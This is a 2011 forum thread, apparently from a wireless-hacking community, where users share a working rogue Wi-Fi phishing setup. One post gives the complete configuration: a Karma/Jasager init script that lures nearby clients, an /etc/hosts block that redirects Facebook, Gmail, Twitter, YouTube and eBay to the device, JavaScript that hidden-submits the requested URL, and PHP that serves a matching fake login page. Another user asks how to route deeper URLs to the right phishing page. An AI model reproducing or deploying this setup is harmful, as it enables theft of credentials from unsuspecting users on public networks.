bmccutch Posted August 1, 2011 Share Posted August 1, 2011 That worked perfectly, great work. my only change was to avoid the textbox containing the url from being displayed by adding: document.theform.host.style.visibility='hidden'; <html> <head> </head> <body> <form action="index.php" method="POST" name="theform"> <input type="text" name="host" value=""/> </form> <script type="text/javascript"> document.theform.host.style.visibility='hidden'; document.theform.host.setAttribute("value",window.location); document.theform.submit(); </script> </body> </html> EDIT: Also just a thought if your worried about the browser not having java enabled you could always have a script checking if its disabled and either just rickroll them or try the other php method Quote Link to comment Share on other sites More sharing options...
UnDeFiNeD Posted August 1, 2011 Share Posted August 1, 2011 This is how i did it.. root@router:/# cat /etc/config/httpd config 'httpd' option 'port' '1338' option 'home' '/www' config 'httpd' option 'port' '80' option 'home' '/wwwguest' root@router:/# cat /etc/hosts #---------------------------------------- # Local #---------------------------------------- 127.0.0.1 localhost. 10.1.0.2 router jasager #---------------------------------------- # Gateway and services #---------------------------------------- 10.1.0.1 gateway 78.24.191.177 downloads.openwrt.org 46.4.11.11 downloads.x-wrt.org #---------------------------------------- # Phishing #---------------------------------------- 10.1.0.2 www.facebook.com facebook.com 10.1.0.2 www.facebook.dk facebook.dk 10.1.0.2 da-dk.facebook.com #---------------------------------------- 10.1.0.2 www.twitter.com twitter.com 10.1.0.2 www.twitter.dk twitter.dk #---------------------------------------- 10.1.0.2 www.gmail.dk gmail.dk 10.1.0.2 www.gmail.com gmail.com 10.1.0.2 mail.google.com 10.1.0.2 mail.google.dk #---------------------------------------- #10.1.0.2 plus.google.com plus.google.dk #---------------------------------------- 10.1.0.2 www.youtube.com youtube.com #---------------------------------------- 10.1.0.2 www.ebay.com ebay.com #---------------------------------------- #10.1.0.2 www.yahoo.com yahoo.com #---------------------------------------- #10.1.0.2 www.linkedin.com linkedin.com #---------------------------------------- root@router:/# cat /etc/php.ini |egrep www|cgi.force_redirect doc_root = /wwwguest cgi.force_redirect = 0 [code]root@router:/# cat /wwwguest/index.html <html><head></head><body> <div id="hideme"> <form action="index.php" method="POST" name="theform"> <input type="text" name="host" style="width:0px;" value="" type="hidden"/> </form> </div> <script type="text/javascript"> document.getElementById('hideme').style.display='none'; function left(str,n){ if (n <= 0) return ""; else if (n > String(str).length) return str; else return String(str).substring(0,n); } function right(str,n){ if (n <= 0) return ""; else if (n > String(str).length) return str; else { var iLen = String(str).length; return String(str).substring(iLen,iLen-n); } } var the_url = window.location.href; var the_url_len = the_url.length-7; the_url = right(the_url,the_url_len) var where_is_slash=the_url.indexOf('/'); the_url = left(the_url,where_is_slash); document.theform.host.setAttribute("value","http://"+the_url); document.theform.submit(); </script> </body> </html> root@router:/# cat /wwwguest/index.php <?php error_reporting(0); $ref = strtolower ( $_POST['host'] ); //$header = str_replace("http://", "https://", $ref); //header ("Location: $header/index.php"); if ("$ref" != "") { if (strpos($ref,"facebook.com")||strpos($ref,"www.facebook.com")||strpos($ref,"facebook.dk")||strpos($ref,"www.facebook.com.")){include('facebook.html');} else if (strpos($ref,"gmail.com")||strpos($ref,"www.gmail.com")||strpos($ref,"gmail.dk")||strpos($ref,"www.gmail.dk")||strpos($ref,"mail.google")){include('gmail.html');} else if (strpos($ref,"twitter.com")||strpos($ref,"www.twitter.com")){include('twitter.html');} else if (strpos($ref,"youtube.com")||strpos($ref,"www.youtube.com")){include('youtube.html');} else if (strpos($ref,"ebay.com")||strpos($ref,"www.ebay.com")){include('ebay.html');} else {include('peets.html');} } else { echo '<html><head>'; echo "<meta http-equiv=\"REFRESH\" content=\"0;url=/index.html\">"; echo '</head><body></body></html>'; } ?> root@router:/etc/init.d# cat /etc/init.d/jasager #!/bin/sh /etc/rc.common # Copyright (C) 2008 dninja@gmail.com START=50 start() { include /lib/network scan_interfaces /karma/bin/create_option_list.rb [ -d /karma/www -a -f /karma/etc/httpd.conf ] && httpd -p 1337 -h /karma/www -r karma -c /karma/etc/httpd.conf # ORIGINAL iptables -I FORWARD -i ath0 -o br-lan -j ACCEPT #------------------------------------------------------------------------------- # PREPARE KARMA #------------------------------------------------------------------------------- iwpriv ath0 maccmd 3; sleep 1 # Clear the MAC ignore list iwpriv ath0 maccmd 2; sleep 1 # To make the list a blacklist. # iwpriv ath0 maccmd 1; sleep 1 # To make the list a whitelist. iwpriv ath0 addmac 00:12:34:13:37:12; sleep 1 # Ignore backtrack wifi interface # iwpriv ath0 addkarmassid "Free Internet"; sleep 1 # Ignore my wifi does not work :( iwpriv ath0 karma 1; sleep 1 # Start karma ifconfig ath0 up; sleep 1 # Activate ath0 interface #------------------------------------------------------------------------------- # IPTABLES VARIABLES #------------------------------------------------------------------------------- IPT='/usr/sbin/iptables' GATEWAY="10.1.0.1" # To the internet ( my thinkpad ) JASAGER="10.1.0.2" # To the targets #------------------------------------------------------------------------------- # REMOVE ALL IPTABLES RULES #------------------------------------------------------------------------------- # reset the default policies in the filter table. $IPT -P INPUT ACCEPT $IPT -P FORWARD ACCEPT $IPT -P OUTPUT ACCEPT # reset the default policies in the nat table. $IPT -t nat -P PREROUTING ACCEPT $IPT -t nat -P POSTROUTING ACCEPT $IPT -t nat -P OUTPUT ACCEPT # reset the default policies in the mangle table. $IPT -t mangle -P PREROUTING ACCEPT $IPT -t mangle -P POSTROUTING ACCEPT $IPT -t mangle -P INPUT ACCEPT $IPT -t mangle -P OUTPUT ACCEPT $IPT -t mangle -P FORWARD ACCEPT # flush all the rules in the filter and nat tables. $IPT -F $IPT -t nat -F $IPT -t mangle -F # erase all chains that's not default in filter and nat table. $IPT -X $IPT -t nat -X $IPT -t mangle -X #------------------------------------------------------------------------------- # Allow localhost #------------------------------------------------------------------------------- $IPT -A INPUT -s 127.0.0.0/8 -i lo -j ACCEPT $IPT -A OUTPUT -s 127.0.0.0/8 -o lo -j ACCEPT #------------------------------------------------------------------------------- # Allow DNS #------------------------------------------------------------------------------- $IPT -A INPUT -i br-lan -d ${JASAGER} -m udp -p udp --dport 53 -j ACCEPT $IPT -A INPUT -i br-lan -d ${JASAGER} -m tcp -p tcp --dport 53 -j ACCEPT #------------------------------------------------------------------------------- # BLOCK STUFF #------------------------------------------------------------------------------- $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --syn -j DROP # Block SYN $IPT -A INPUT -i eth0 -d ${JASAGER} -f -j DROP # Block Fragments # Block NMAP Scans: $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP # $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL ALL -j DROP # $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL NONE -j DROP # NULL $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP # $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP # XMAS $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP # $IPT -A INPUT -d ${JASAGER} -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT # OK for http requests #------------------------------------------------------------------------------- # iptables -A INPUT -m limit --limit 15/minute -j LOG --log-level 7 --log-prefix "Dropped by firewall:" $IPT -A INPUT -s ! ${GATEWAY} -d ${JASAGER} -m state --state NEW -j DROP # NEW only from Gateway #------------------------------------------------------------------------------- /usr/sbin/iwconfig ath0 txpower 18 #------------------------------------------------------------------------------- logread -f | awk '{if ($0 ~ /(KARMA: |DHCPACK|DHCPDISCOVER|DHCPOFFER|DHCPREQUEST)/) {sub (/ \(.*\).*: /, ": ", $0); print $0 ;}} ' > /tmp/status.log & tail -f /tmp/status.log | /karma/bin/logwatch & } stop() { killall httpd } Got a question for you, this will point all facebook.com subdirectories to the correct page? It looks like you take the host up till the slash but will your config settings allow for (for example) http://www.facebook.com/careers/?ref=pf to point to the correct phishing page? I havent figured out how to get around the fact that the fon tries to look locally for the /careers/?ref=pf page... I will try your way out when I get home, you obviously spent more than the 2 minutes that I took looking for a fix lol... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.